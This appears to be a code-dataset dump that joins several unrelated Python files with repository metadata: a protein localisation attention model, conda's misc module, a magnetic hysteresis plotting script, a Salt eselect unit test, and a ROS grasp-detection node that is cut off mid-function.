filters=128, kernel_size=f_size_b, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_reshu)
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_hid, return_sequences=True, return_state=True,
activation="tanh")) \
(l_conv_final)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(l_lstm, state_h)
l_drop2 = layers.Dropout(self.drop_hid)(context_vector)
l_dense = layers.Dense(self.n_hid * 2, activation="relu", kernel_initializer=initializer)(l_drop2)
l_drop3 = layers.Dropout(self.drop_hid)(l_dense)
l_out = layers.Dense(self.n_class, activation="softmax", kernel_initializer=initializer)(l_drop3)
self.model = keras.Model(inputs, l_out)
# gradient clipping clips parameters' gradients during backprop by a maximum value of 2
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss='categorical_crossentropy',
optimizer=optimizers.Adam(learning_rate=self.lr, clipvalue=2, clipnorm=3),
metrics=['accuracy'])
# setting initial state tensors to be passed to the first call of the cell (cell init and hid init in
# bidirectional LSTM)
self.model.layers[12].initial_states = [tf.keras.initializers.Orthogonal(), tf.keras.initializers.Orthogonal()]
return self.model
def prepare_metrics(self, history, X_val, validation, num_epochs):
self.history = history
self.X_val = X_val
self.validation = validation
self.num_epochs = num_epochs
def confusion_matrix_location(self):
# The confusion matrix shows how well is predicted each class and which are the most common mis-classifications.
Y_pred = self.model.predict(self.X_val)
# taking prediction for subcellular location
y_pred = np.argmax(Y_pred[0], axis=1)
self.confusion_mat = confusion_matrix(self.validation['y_val_location'], y_pred)
plt.figure(figsize=(8, 8))
colormap = plt.cm.Blues
plt.imshow(self.confusion_mat, interpolation='nearest', cmap=colormap)
plt.title('Confusion matrix on subcellular location - validation set')
plt.colorbar()
tick_marks = np.arange(self.n_class)
plt.xticks(tick_marks, self.classes_subcellular, rotation=60)
plt.yticks(tick_marks, self.classes_subcellular)
thresh = self.confusion_mat.max() / 2.
for i, j in itertools.product(range(self.confusion_mat.shape[0]), range(self.confusion_mat.shape[1])):
plt.text(j, i, self.confusion_mat[i, j], horizontalalignment="center",
color="white" if self.confusion_mat[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True location')
plt.xlabel('Predicted location')
plt.show()
def confusion_matrix_membrane(self):
# The confusion matrix shows how well is predicted each class and which are the most common mis-classifications.
Y_pred = self.model.predict(self.X_val)
# taking the prediction for membrane
y_pred = np.argmax(Y_pred[1], axis=1)
self.confusion_mat = confusion_matrix(self.validation['y_val_membrane'], y_pred)
plt.figure(figsize=(8, 8))
colormap = plt.cm.Blues
plt.imshow(self.confusion_mat, interpolation='nearest', cmap=colormap)
plt.title('Confusion matrix on membrane - validation set')
plt.colorbar()
tick_marks = np.arange(3)
plt.xticks(tick_marks, self.classes_membrane, rotation=60)
plt.yticks(tick_marks, self.classes_membrane)
thresh = self.confusion_mat.max() / 2.
for i, j in itertools.product(range(self.confusion_mat.shape[0]), range(self.confusion_mat.shape[1])):
plt.text(j, i, self.confusion_mat[i, j], horizontalalignment="center",
color="white" if self.confusion_mat[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True membrane')
plt.xlabel('Predicted membrane')
plt.show()
def attention_graph(self):
intermediate_layer_model = keras.Model(inputs=self.model.input,
outputs=self.model.layers[3].output)
intermediate_output = intermediate_layer_model(self.X_val)
alphas = np.array(intermediate_output[1])
y_val = self.validation['y_val_location']
sort_ind = np.argsort(y_val)
# alphas shape is of the form (#sequences, length sequence, 1), e.g. (635, 400, 1)
alphas_1 = np.array(alphas).reshape((alphas.shape[0], alphas.shape[1]))[sort_ind]
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 15))
labels_plot = ax1.imshow(y_val[sort_ind].reshape(alphas.shape[0], 1), cmap=plt.get_cmap('Set1'))
ax1.set_aspect(0.3)
ax1.set_axis_off()
cb = plt.colorbar(labels_plot)
labels = np.arange(0, 10, 1)
loc = labels + .5
cb.set_ticks(loc)
cb.set_ticklabels(self.classes_subcellular)
att_plot = ax2.imshow(alphas_1, aspect='auto')
ax2.yaxis.set_visible(True)
plt.tight_layout(pad=25, w_pad=0.5, h_pad=1.0)
def MCC(self):
# The Matthews correlation coefficient is a measure of the quality of binary and multiclass (and in this case
# it is called Gorodkin measure) classifications.
# It takes into account true and false positives and negatives. Is as a balanced measure which can be used
# even if the classes are of very different sizes.
# The MCC is in essence a correlation coefficient value between -1 and +1.
# A coefficient of +1 represents a perfect prediction, 0 an average random prediction and -1 an inverse
# prediction.
Y_pred = self.model.predict(self.X_val)
y_pred = np.argmax(Y_pred[1], axis=1)
return matthews_corrcoef(self.validation['y_val_membrane'], y_pred)
def gorodkin(self):
# The Matthews correlation coefficient is a measure of the quality of binary and multiclass (and in this case
# it is called Gorodkin measure) classifications.
# It takes into account true and false positives and negatives. Is as a balanced measure which can be used
# even if the classes are of very different sizes.
# The MCC is in essence a correlation coefficient value between -1 and +1.
# A coefficient of +1 represents a perfect prediction, 0 an average random prediction and -1 an inverse
# prediction.
Y_pred = self.model.predict(self.X_val)
y_pred = np.argmax(Y_pred[0], axis=1)
return matthews_corrcoef(self.validation['y_val_location'], y_pred)
def accuracy_loss_plots_subcellular(self):
x_axis = range(self.num_epochs)
plt.figure(figsize=(8, 6))
# loss_training:
plt.plot(x_axis, self.history.history['subcellular_loss'])
# loss_validation
plt.plot(x_axis, self.history.history['val_subcellular_loss'])
plt.xlabel('Epoch')
plt.title("Loss on Subcellular localization")
plt.ylabel('Error')
plt.legend(('Training', 'Validation'))
plt.show()
plt.figure(figsize=(8, 6))
# accuracy_training:
plt.plot(x_axis, self.history.history['subcellular_accuracy'])
# accuracy_validation
plt.plot(x_axis, self.history.history['val_subcellular_accuracy'])
plt.xlabel('Epoch')
plt.title("Accuracy on Subcellular localization")
plt.ylabel('Accuracy')
plt.legend(('Training', 'Validation'))
plt.show()
def accuracy_loss_plots_membrane(self):
x_axis = range(self.num_epochs)
plt.figure(figsize=(8, 6))
# loss_training:
plt.plot(x_axis, self.history.history['membrane_loss'])
# loss_validation
plt.plot(x_axis, self.history.history['val_membrane_loss'])
plt.xlabel('Epoch')
plt.title("Loss on membrane")
plt.ylabel('Error')
plt.legend(('Training', 'Validation'))
plt.show()
plt.figure(figsize=(8, 6))
# accuracy_training:
plt.plot(x_axis, self.history.history['membrane_accuracy'])
# accuracy_validation
plt.plot(x_axis, self.history.history['val_membrane_accuracy'])
plt.xlabel('Epoch')
plt.title("Accuracy on membrane")
plt.ylabel('Accuracy')
plt.legend(('Training', 'Validation'))
plt.show()
def print_measures(self, net_name):
acc_index = np.argmin(self.history.history['val_loss'])
global_loss_min = self.history.history['val_loss'][acc_index]
loss_subcellular = self.history.history['val_subcellular_loss'][acc_index]
loss_membrane = self.history.history['val_membrane_loss'][acc_index]
subcellular_accuracy = self.history.history['val_subcellular_accuracy'][acc_index]
membrane_accuracy = self.history.history['val_membrane_accuracy'][acc_index]
print("Best values for Network {}".format(net_name))
print("-------------------------------------")
print("Minimum global loss: {:.6f}".format(global_loss_min))
print("With validation loss (subcellular localization): {:.6f}".format(loss_subcellular))
print("With validation loss (membrane): {:.6f}".format(loss_membrane))
print("With accuracy (subcellular localization): {:.6f}".format(subcellular_accuracy))
print("With accuracy (membrane): {:.6f}".format(membrane_accuracy))
print("Gorodkin measure on validation (subcellular localization): {}".format(self.gorodkin()))
print("MCC measure on validation (membrane): {}".format(self.MCC()))
| 51.211509
| 138
| 0.650764
|
794d8f040221fc90fe127e9a149fd01c59dbfd63
| 11,431
|
py
|
Python
|
conda/misc.py
|
astrojuanlu/conda
|
badf048f5e8287250ef1940249a048f9bde08477
|
[
"BSD-3-Clause"
] | null | null | null |
conda/misc.py
|
astrojuanlu/conda
|
badf048f5e8287250ef1940249a048f9bde08477
|
[
"BSD-3-Clause"
] | null | null | null |
conda/misc.py
|
astrojuanlu/conda
|
badf048f5e8287250ef1940249a048f9bde08477
|
[
"BSD-3-Clause"
] | null | null | null |
# this module contains miscellaneous stuff which enventually could be moved
# into other places
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
import os
from os.path import (abspath, dirname, exists, expanduser, isdir, isfile, islink, join,
relpath)
import re
import shutil
import sys
from ._vendor.auxlib.path import expand
from .base.context import context
from .common.compat import iteritems, iterkeys, itervalues, on_win
from .common.path import url_to_path, win_path_ok
from .common.url import is_url, join_url, path_to_url
from .core.index import get_index, supplement_index_with_cache
from .core.linked_data import linked_data
from .core.package_cache import PackageCache, ProgressiveFetchExtract
from .exceptions import CondaFileNotFoundError, CondaRuntimeError, ParseError
from .gateways.disk.delete import rm_rf
from .instructions import LINK, UNLINK
from .models.dist import Dist
from .models.index_record import IndexRecord
from .plan import execute_actions
from .resolve import MatchSpec, Resolve
def conda_installed_files(prefix, exclude_self_build=False):
"""
Return the set of files which have been installed (using conda) into
a given prefix.
"""
res = set()
for dist, meta in iteritems(linked_data(prefix)):
if exclude_self_build and 'file_hash' in meta:
continue
res.update(set(meta.get('files', ())))
return res
url_pat = re.compile(r'(?:(?P<url_p>.+)(?:[/\\]))?'
r'(?P<fn>[^/\\#]+\.tar\.bz2)'
r'(:?#(?P<md5>[0-9a-f]{32}))?$')
def explicit(specs, prefix, verbose=False, force_extract=True, index_args=None, index=None):
actions = defaultdict(list)
actions['PREFIX'] = prefix
fetch_recs = {}
for spec in specs:
if spec == '@EXPLICIT':
continue
if not is_url(spec):
spec = path_to_url(expand(spec))
# parse URL
m = url_pat.match(spec)
if m is None:
raise ParseError('Could not parse explicit URL: %s' % spec)
url_p, fn, md5sum = m.group('url_p'), m.group('fn'), m.group('md5')
url = join_url(url_p, fn)
# url_p is everything but the tarball_basename and the md5sum
# If the path points to a file in the package cache, we need to use
# the dist name that corresponds to that package. The MD5 may not
# match, but we will let PFE below worry about that
dist = None
if url.startswith('file:/'):
path = win_path_ok(url_to_path(url))
if dirname(path) in context.pkgs_dirs:
if not exists(path):
raise CondaFileNotFoundError(path)
pc_entry = PackageCache.tarball_file_in_cache(path)
dist = pc_entry.dist
url = dist.to_url() or pc_entry.get_urls_txt_value()
md5sum = md5sum or pc_entry.md5sum
dist = dist or Dist(url)
fetch_recs[dist] = {'md5': md5sum, 'url': url}
# perform any necessary fetches and extractions
if verbose:
from .console import setup_verbose_handlers
setup_verbose_handlers()
link_dists = tuple(iterkeys(fetch_recs))
pfe = ProgressiveFetchExtract(fetch_recs, link_dists)
pfe.execute()
# Now get the index---but the only index we need is the package cache
index = {}
supplement_index_with_cache(index, ())
# unlink any installed packages with same package name
link_names = {index[d]['name'] for d in link_dists}
actions[UNLINK].extend(d for d, r in iteritems(linked_data(prefix))
if r['name'] in link_names)
actions[LINK].extend(link_dists)
execute_actions(actions, index, verbose=verbose)
return actions
def rel_path(prefix, path, windows_forward_slashes=True):
res = path[len(prefix) + 1:]
if on_win and windows_forward_slashes:
res = res.replace('\\', '/')
return res
def walk_prefix(prefix, ignore_predefined_files=True, windows_forward_slashes=True):
"""
Return the set of all files in a given prefix directory.
"""
res = set()
prefix = abspath(prefix)
ignore = {'pkgs', 'envs', 'conda-bld', 'conda-meta', '.conda_lock',
'users', 'LICENSE.txt', 'info', 'conda-recipes', '.index',
'.unionfs', '.nonadmin'}
binignore = {'conda', 'activate', 'deactivate'}
if sys.platform == 'darwin':
ignore.update({'python.app', 'Launcher.app'})
for fn in os.listdir(prefix):
if ignore_predefined_files and fn in ignore:
continue
if isfile(join(prefix, fn)):
res.add(fn)
continue
for root, dirs, files in os.walk(join(prefix, fn)):
should_ignore = ignore_predefined_files and root == join(prefix, 'bin')
for fn2 in files:
if should_ignore and fn2 in binignore:
continue
res.add(relpath(join(root, fn2), prefix))
for dn in dirs:
path = join(root, dn)
if islink(path):
res.add(relpath(path, prefix))
if on_win and windows_forward_slashes:
return {path.replace('\\', '/') for path in res}
else:
return res
def untracked(prefix, exclude_self_build=False):
"""
Return (the set) of all untracked files for a given prefix.
"""
conda_files = conda_installed_files(prefix, exclude_self_build)
return {path for path in walk_prefix(prefix) - conda_files
if not (path.endswith('~') or
(sys.platform == 'darwin' and path.endswith('.DS_Store')) or
(path.endswith('.pyc') and path[:-1] in conda_files))}
def which_prefix(path):
"""
given the path (to a (presumably) conda installed file) return the
environment prefix in which the file in located
"""
prefix = abspath(path)
while True:
if isdir(join(prefix, 'conda-meta')):
# we found the it, so let's return it
return prefix
if prefix == dirname(prefix):
# we cannot chop off any more directories, so we didn't find it
return None
prefix = dirname(prefix)
def touch_nonadmin(prefix):
"""
Creates $PREFIX/.nonadmin if sys.prefix/.nonadmin exists (on Windows)
"""
if on_win and exists(join(context.root_dir, '.nonadmin')):
if not isdir(prefix):
os.makedirs(prefix)
with open(join(prefix, '.nonadmin'), 'w') as fo:
fo.write('')
def append_env(prefix):
dir_path = abspath(expanduser('~/.conda'))
try:
if not isdir(dir_path):
os.mkdir(dir_path)
with open(join(dir_path, 'environments.txt'), 'a') as f:
f.write('%s\n' % prefix)
except IOError:
pass
def clone_env(prefix1, prefix2, verbose=True, quiet=False, index_args=None):
"""
clone existing prefix1 into new prefix2
"""
untracked_files = untracked(prefix1)
# Discard conda, conda-env and any package that depends on them
drecs = linked_data(prefix1)
filter = {}
found = True
while found:
found = False
for dist, info in iteritems(drecs):
name = info['name']
if name in filter:
continue
if name == 'conda':
filter['conda'] = dist
found = True
break
if name == "conda-env":
filter["conda-env"] = dist
found = True
break
for dep in info.get('depends', []):
if MatchSpec(dep).name in filter:
filter[name] = dist
found = True
if filter:
if not quiet:
print('The following packages cannot be cloned out of the root environment:')
for pkg in itervalues(filter):
print(' - ' + pkg.dist_name)
drecs = {dist: info for dist, info in iteritems(drecs) if info['name'] not in filter}
# Resolve URLs for packages that do not have URLs
r = None
index = {}
unknowns = [dist for dist, info in iteritems(drecs) if not info.get('url')]
notfound = []
if unknowns:
index_args = index_args or {}
index = get_index(**index_args)
r = Resolve(index, sort=True)
for dist in unknowns:
name = dist.dist_name
fn = dist.to_filename()
fkeys = [d for d in r.index.keys() if r.index[d]['fn'] == fn]
if fkeys:
del drecs[dist]
dist_str = sorted(fkeys, key=r.version_key, reverse=True)[0]
drecs[Dist(dist_str)] = r.index[dist_str]
else:
notfound.append(fn)
if notfound:
what = "Package%s " % ('' if len(notfound) == 1 else 's')
notfound = '\n'.join(' - ' + fn for fn in notfound)
msg = '%s missing in current %s channels:%s' % (what, context.subdir, notfound)
raise CondaRuntimeError(msg)
# Assemble the URL and channel list
urls = {}
for dist, info in iteritems(drecs):
fkey = dist
if fkey not in index:
index[fkey] = IndexRecord.from_objects(info, not_fetched=True)
r = None
urls[dist] = info['url']
if r is None:
r = Resolve(index)
dists = r.dependency_sort({d.quad[0]: d for d in urls.keys()})
urls = [urls[d] for d in dists]
if verbose:
print('Packages: %d' % len(dists))
print('Files: %d' % len(untracked_files))
for f in untracked_files:
src = join(prefix1, f)
dst = join(prefix2, f)
dst_dir = dirname(dst)
if islink(dst_dir) or isfile(dst_dir):
rm_rf(dst_dir)
if not isdir(dst_dir):
os.makedirs(dst_dir)
if islink(src):
os.symlink(os.readlink(src), dst)
continue
try:
with open(src, 'rb') as fi:
data = fi.read()
except IOError:
continue
try:
s = data.decode('utf-8')
s = s.replace(prefix1, prefix2)
data = s.encode('utf-8')
except UnicodeDecodeError: # data is binary
pass
with open(dst, 'wb') as fo:
fo.write(data)
shutil.copystat(src, dst)
actions = explicit(urls, prefix2, verbose=not quiet, index=index,
force_extract=False, index_args=index_args)
return actions, untracked_files
def make_icon_url(info):
if info.get('channel') and info.get('icon'):
base_url = dirname(info['channel'])
icon_fn = info['icon']
# icon_cache_path = join(pkgs_dir, 'cache', icon_fn)
# if isfile(icon_cache_path):
# return url_path(icon_cache_path)
return '%s/icons/%s' % (base_url, icon_fn)
return ''
def list_prefixes():
# Lists all the prefixes that conda knows about.
for envs_dir in context.envs_dirs:
if not isdir(envs_dir):
continue
for dn in sorted(os.listdir(envs_dir)):
if dn.startswith('.'):
continue
prefix = join(envs_dir, dn)
if isdir(prefix):
prefix = join(envs_dir, dn)
yield prefix
yield context.root_dir
| 34.224551
| 97
| 0.593036
|
794d8f5be6b479b0f51c6e40fdfe4046cd62bcd9
| 3,096
|
py
|
Python
|
Transformer/B-H-Diagram.py
|
AlexTsagas/Quality-Graphs
|
eb03f0baf84db4343d6048143ababa724813de94
|
[
"MIT"
] | 1
|
2021-10-03T19:07:57.000Z
|
2021-10-03T19:07:57.000Z
|
Transformer/B-H-Diagram.py
|
AlexTsagas/Quality-Graphs
|
eb03f0baf84db4343d6048143ababa724813de94
|
[
"MIT"
] | null | null | null |
Transformer/B-H-Diagram.py
|
AlexTsagas/Quality-Graphs
|
eb03f0baf84db4343d6048143ababa724813de94
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
import pandas as pd
from scipy import integrate
# Write with LaTeX
rc('text', usetex=True)
rc('font', family='serif')
# Read .csv file
B_s, B_e = [], []
H_s, H_e = [], []
m_s, m_e = [], []
file = pd.read_csv('D2-Measurments.csv', header=None)
B_e, B_s = file[1][10:-11], file[6][12:]
H_e, H_s = file[2][10:-11], file[7][12:]
m_e, m_s = file[3][10:-11], file[8][12:]
m_s[22], m_s[40] = 0, 0
m_e[16], m_e[30] = 0, 0
# Convert to numbers
B_e, B_s = [int(Be) for Be in B_e], [int(Bs) for Bs in B_s]
H_e, H_s = [int(He) for He in H_e], [int(Hs) for Hs in H_s]
m_e, m_s = [float(me) for me in m_e], [float(ms) for ms in m_s]
# Integrals
BB_e, HH_e = [Be*0.001 + 0.950 for Be in B_e], [He + 5050 for He in H_e]
## Plot to see where we integrate
# plt.plot(HH_e[:14], BB_e[:14], color='black')
# plt.plot(HH_e[13:-1], BB_e[13:-1], color='red')
# plt.show()
Ie1, Ie2 = integrate.simps(y=BB_e[:14], x=HH_e[:14], even='avg'), integrate.simps(y=BB_e[13:-1], x=HH_e[13:-1], even='avg')
Ie = Ie1 + Ie2
BB_s, HH_s = [Bs*0.001 + 0.550 for Bs in B_s], [Hs + 8000 for Hs in H_s]
## Plot to see where we integrate
# plt.plot(HH_s[:21], BB_s[:21], color='black')
# plt.plot(HH_s[20:], BB_s[20:], color='red')
# plt.show()
Is1, Is2 = integrate.simps(BB_s[:21], HH_s[:21], even='avg'), integrate.simps(BB_s[20:], HH_s[20:], even = 'avg')
Is = Is1+Is2
# Plot
fig1, (ax1, ax2) = plt.subplots(1,2)
# Compact
ax1.plot(H_s, B_s, color='black', linewidth=1, marker='.')
ax1.set_xlabel(r'$H$' r' (A/m)')
ax1.set_ylabel(r'$B$' r' (mT)')
ax1.tick_params(labelsize = 6)
ax1.set_xticks(ticks = np.arange(-8000,8001,2000))
ax1.set_yticks(ticks = np.arange(-600,601,100))
ax1.set_title("Compact Core")
ax1.grid()
# Laminated
ax2.plot(H_e, B_e, color='red', linewidth=1, marker='.')
ax2.set_xlabel(r'$H$' r' (A/m)')
ax2.set_ylabel(r'$B$' r' (mT)')
ax2.tick_params(labelsize = 6)
ax2.set_xticks(ticks = np.arange(-6000,6001,2000))
ax2.set_yticks(ticks = np.arange(-1000,1001,100))
ax2.set_title("Laminated Core")
ax2.grid()
fig1.tight_layout()
# Fix infinity
## Print to see where infinities occur
# print(m_s)
m_s.pop(10)
H_s.pop(10)
m_s.pop(27)
H_s.pop(27)
# print(m_s, H_s)
m_e.pop(6)
H_e.pop(6)
m_e.pop(19)
H_e.pop(19)
# Plot
fig2, (ax3, ax4) = plt.subplots(1,2)
# Compact
ax3.plot(H_s, m_s, color='black', linewidth=1, marker='.')
ax3.set_xlabel(r'$H$' r' (A/m)')
ax3.set_ylabel(r'$\mu$' r' ($10^{-3}$ N/A$^2$)')
ax3.tick_params(labelsize = 6)
ax3.set_xticks(ticks = np.arange(-8000,8001,2000))
ax3.set_yticks(ticks = np.arange(-0.05,0.31,0.05))
ax3.set_title("Compact Core")
ax3.grid()
# Laminated
ax4.plot(H_e, m_e, color='red', linewidth=1, marker='.')
ax4.set_xlabel(r'$H$' r' (A/m)')
ax4.set_ylabel(r'$\mu$' r' ($10^{-3}$ N/A$^2$)')
ax4.tick_params(labelsize = 6)
ax4.set_xticks(ticks = np.arange(-6000,6001,2000))
ax4.set_yticks(ticks = np.arange(0.17,0.25,0.01))
ax4.set_title("Laminated Core")
ax4.grid()
fig2.tight_layout()
plt.show()
print(f'\nWork on Laminated core = {Ie} J, \nWork on Cmpact Core = {Is} J')
| 25.377049
| 123
| 0.64438
|
794d8ff1f62517bb0385bcbfbb67afa1cba7ed5c
| 1,213
|
py
|
Python
|
tests/unit/states/test_eselect.py
|
velom/salt
|
f5d4334178c50d0dfcd205d5a7fb9cfb27fd369e
|
[
"Apache-2.0"
] | 1
|
2021-04-05T19:46:35.000Z
|
2021-04-05T19:46:35.000Z
|
tests/unit/states/test_eselect.py
|
dv-trading/salt
|
f5d4334178c50d0dfcd205d5a7fb9cfb27fd369e
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/states/test_eselect.py
|
dv-trading/salt
|
f5d4334178c50d0dfcd205d5a7fb9cfb27fd369e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Jayesh Kariya <jayeshk@saltstack.com>`
'''
# Import Python libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
NO_MOCK,
NO_MOCK_REASON,
MagicMock,
patch)
# Import Salt Libs
from salt.states import eselect
eselect.__salt__ = {}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class EselectTestCase(TestCase):
'''
Test cases for salt.states.eselect
'''
# 'set_' function tests: 1
def test_set_(self):
'''
Test to verify that the given module is set to the given target
'''
name = 'myeselect'
target = 'hardened/linux/amd64'
ret = {'name': name,
'result': True,
'comment': '',
'changes': {}}
mock = MagicMock(return_value=target)
with patch.dict(eselect.__salt__, {'eselect.get_current_target': mock}):
comt = ('Target \'{0}\' is already set on \'{1}\' module.'
.format(target, name))
ret.update({'comment': comt})
self.assertDictEqual(eselect.set_(name, target), ret)
| 25.808511
| 80
| 0.597692
|
794d8fffa4644b04f1b8779986a16cec6e902586
| 7,975
|
py
|
Python
|
scripts/run_ggcnn_with_detection.py
|
kamilmlodzikowski/ggcnn_ur5_grasping
|
8604813360357aef82ab2516fef0d66e55d4b6ef
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/run_ggcnn_with_detection.py
|
kamilmlodzikowski/ggcnn_ur5_grasping
|
8604813360357aef82ab2516fef0d66e55d4b6ef
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/run_ggcnn_with_detection.py
|
kamilmlodzikowski/ggcnn_ur5_grasping
|
8604813360357aef82ab2516fef0d66e55d4b6ef
|
[
"BSD-3-Clause"
] | null | null | null |
#! /home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/python_ggcnn/bin/python3
import time
import numpy as np
import tensorflow as tf
from keras.models import load_model
from tensorflow.keras.models import Sequential
import cv2
import scipy.ndimage as ndimage
from skimage.draw import circle
from skimage.feature import peak_local_max
import os
import sys
import rospy
import numpy as np
from cv_bridge import CvBridge
from geometry_msgs.msg import PoseStamped
from sensor_msgs.msg import Image, CameraInfo
from std_msgs.msg import Float32MultiArray
bridge = CvBridge()
mypath = homedir = os.path.expanduser("~")
# Load the Network.
mypath='/home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/ggcnn/data/networks/ggcnn_rss/epoch_29_model.hdf5'
MODEL_FILE = '/home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/ggcnn/data/networks/ggcnn_rss/epoch_29_model.hdf5'
model = load_model(mypath)
model.compile()
model.run_eagerly = True
print("\nEAGERLY:")
print(model.run_eagerly)
rospy.init_node('ggcnn_detection')
# Output publishers.
grasp_pub = rospy.Publisher('ggcnn/img/grasp', Image, queue_size=1)
#grasp_plain_pub = rospy.Publisher('ggcnn/img/grasp_plain', Image, queue_size=1)
#depth_pub = rospy.Publisher('ggcnn/img/depth', Image, queue_size=1)
#ang_pub = rospy.Publisher('ggcnn/img/ang', Image, queue_size=1)
cmd_pub = rospy.Publisher('ggcnn/out/command', Float32MultiArray, queue_size=1)
# Initialise some globals.
prev_mp = np.array([150, 150])
ROBOT_Z = 0
# Tensorflow graph to allow use in callback.
graph = tf.compat.v1.get_default_graph()
# Get the camera parameters
print('Waiting for /camera_info')
camera_info_msg = rospy.wait_for_message('/camera/aligned_depth_to_color/camera_info', CameraInfo)
print('Got /camera_info, moving on')
K = camera_info_msg.K
fx = K[0]
cx = K[2]
fy = K[4]
cy = K[5]
# Execution Timing
class TimeIt:
def __init__(self, s):
self.s = s
self.t0 = None
self.t1 = None
self.print_output = False
def __enter__(self):
self.t0 = time.time()
def __exit__(self, t, value, traceback):
self.t1 = time.time()
if self.print_output:
print('%s: %s' % (self.s, self.t1 - self.t0))
def robot_pos_callback(data):
global ROBOT_Z
ROBOT_Z = data.pose.position.z
def depth_callback(depth_message):
global model
global graph
global prev_mp
global ROBOT_Z
global fx, cx, fy, cy
with TimeIt('Crop'):
depth = bridge.imgmsg_to_cv2(depth_message)
depth_med = np.array(depth).flatten()
depth_med = np.median(depth)
depth = np.where(depth<=50, depth_med, depth)
depth = np.where(depth>depth_med-10, depth_med, depth)
# Crop a square out of the middle of the depth and resize it to 300*300
crop_size = 400 # depth.shape[0]
depth_crop = cv2.resize(depth[(480-crop_size)//2:(480-crop_size)//2+crop_size, (640-crop_size)//2:(640-crop_size)//2+crop_size], (300, 300))
# Replace nan with 0 for inpainting.
depth_crop = depth_crop.copy()
depth_nan = np.isnan(depth_crop).copy()
depth_crop[depth_nan] = 0
with TimeIt('Inpaint'):
# open cv inpainting does weird things at the border.
depth_crop = cv2.copyMakeBorder(depth_crop, 1, 1, 1, 1, cv2.BORDER_DEFAULT)
mask = (depth_crop == 0).astype(np.uint8)
# Scale to keep as float, but has to be in bounds -1:1 to keep opencv happy.
depth_scale = np.abs(depth_crop).max()
depth_crop = depth_crop.astype(np.float32)/depth_scale # Has to be float32, 64 not supported.
depth_crop = cv2.inpaint(depth_crop, mask, 1, cv2.INPAINT_NS)
# Back to original size and value range.
depth_crop = depth_crop[1:-1, 1:-1]
depth_crop = depth_crop * depth_scale
with TimeIt('Calculate Depth'):
# Figure out roughly the depth in mm of the part between the grippers for collision avoidance.
depth_center = depth_crop[100:141, 130:171].flatten()
depth_center.sort()
depth_center = depth_center[:10].mean() * 1000
with TimeIt('Inference'):
# Run it through the network.
depth_crop = np.clip((depth_crop - depth_crop.mean()), -1, 1)
#with graph.as_default():
pred_out = model.predict(depth_crop.reshape((1, 300, 300, 1)))
points_out = pred_out[0].squeeze()
points_out[depth_nan] = 0
with TimeIt('Trig'):
# Calculate the angle map.
cos_out = pred_out[1].squeeze()
sin_out = pred_out[2].squeeze()
ang_out = np.arctan2(sin_out, cos_out)/2.0
width_out = pred_out[3].squeeze() * 150.0 # Scaled 0-150:0-1
with TimeIt('Filter'):
# Filter the outputs.
points_out = ndimage.filters.gaussian_filter(points_out, 5.0) # 3.0
ang_out = ndimage.filters.gaussian_filter(ang_out, 2.0)
with TimeIt('Control'):
# Calculate the best pose from the camera intrinsics.
maxes = None
ALWAYS_MAX = False # Use ALWAYS_MAX = True for the open-loop solution.
if ROBOT_Z > 0.34 or ALWAYS_MAX: # > 0.34 initialises the max tracking when the robot is reset.
# Track the global max.
max_pixel = np.array(np.unravel_index(np.argmax(points_out), points_out.shape))
prev_mp = max_pixel.astype(np.int)
else:
# Calculate a set of local maxes. Choose the one that is closes to the previous one.
maxes = peak_local_max(points_out, min_distance=10, threshold_abs=0.1, num_peaks=3)
if maxes.shape[0] == 0:
return
max_pixel = maxes[np.argmin(np.linalg.norm(maxes - prev_mp, axis=1))]
# Keep a global copy for next iteration.
prev_mp = (max_pixel * 0.5 + prev_mp * 0.5).astype(np.int)
ang = ang_out[max_pixel[0], max_pixel[1]]
width = width_out[max_pixel[0], max_pixel[1]]
# Convert max_pixel back to uncropped/resized image coordinates in order to do the camera transform.
max_pixel = ((np.array(max_pixel) / 300.0 * crop_size) + np.array([(480 - crop_size)//2, (640 - crop_size) // 2]))
max_pixel = np.round(max_pixel).astype(np.int)
point_depth = depth[max_pixel[0], max_pixel[1]]
# These magic numbers are my camera intrinsic parameters.
x = (max_pixel[1] - cx)/(fx) * point_depth
y = (max_pixel[0] - cy)/(fy) * point_depth
z = point_depth.astype(np.float32)
if np.isnan(z):
return
with TimeIt('Draw'):
# Draw grasp markers on the points_out and publish it. (for visualisation)
grasp_img = np.zeros((300, 300, 3), dtype=np.uint8)
points_out = np.clip(points_out*255, 0, 255)
grasp_img[:,:,2] = (points_out)
grasp_img_plain = grasp_img.copy()
rr, cc = circle(prev_mp[0], prev_mp[1], 5)
grasp_img[rr, cc, 0] = 0
grasp_img[rr, cc, 1] = 255
grasp_img[rr, cc, 2] = 0
with TimeIt('Publish'):
# Publish the output images (not used for control, only visualisation)
grasp_img = bridge.cv2_to_imgmsg(grasp_img, 'bgr8')
grasp_img.header = depth_message.header
grasp_pub.publish(grasp_img)
grasp_img_plain = bridge.cv2_to_imgmsg(grasp_img_plain, 'bgr8')
grasp_img_plain.header = depth_message.header
#grasp_plain_pub.publish(grasp_img_plain)
#depth_pub.publish(bridge.cv2_to_imgmsg(depth_crop))
#ang_pub.publish(bridge.cv2_to_imgmsg(ang_out))
# Output the best grasp pose relative to camera.
cmd_msg = Float32MultiArray()
cmd_msg.data = [x, y, z, ang, width, depth_center]
#print ("DATA: ", cmd_msg.data)
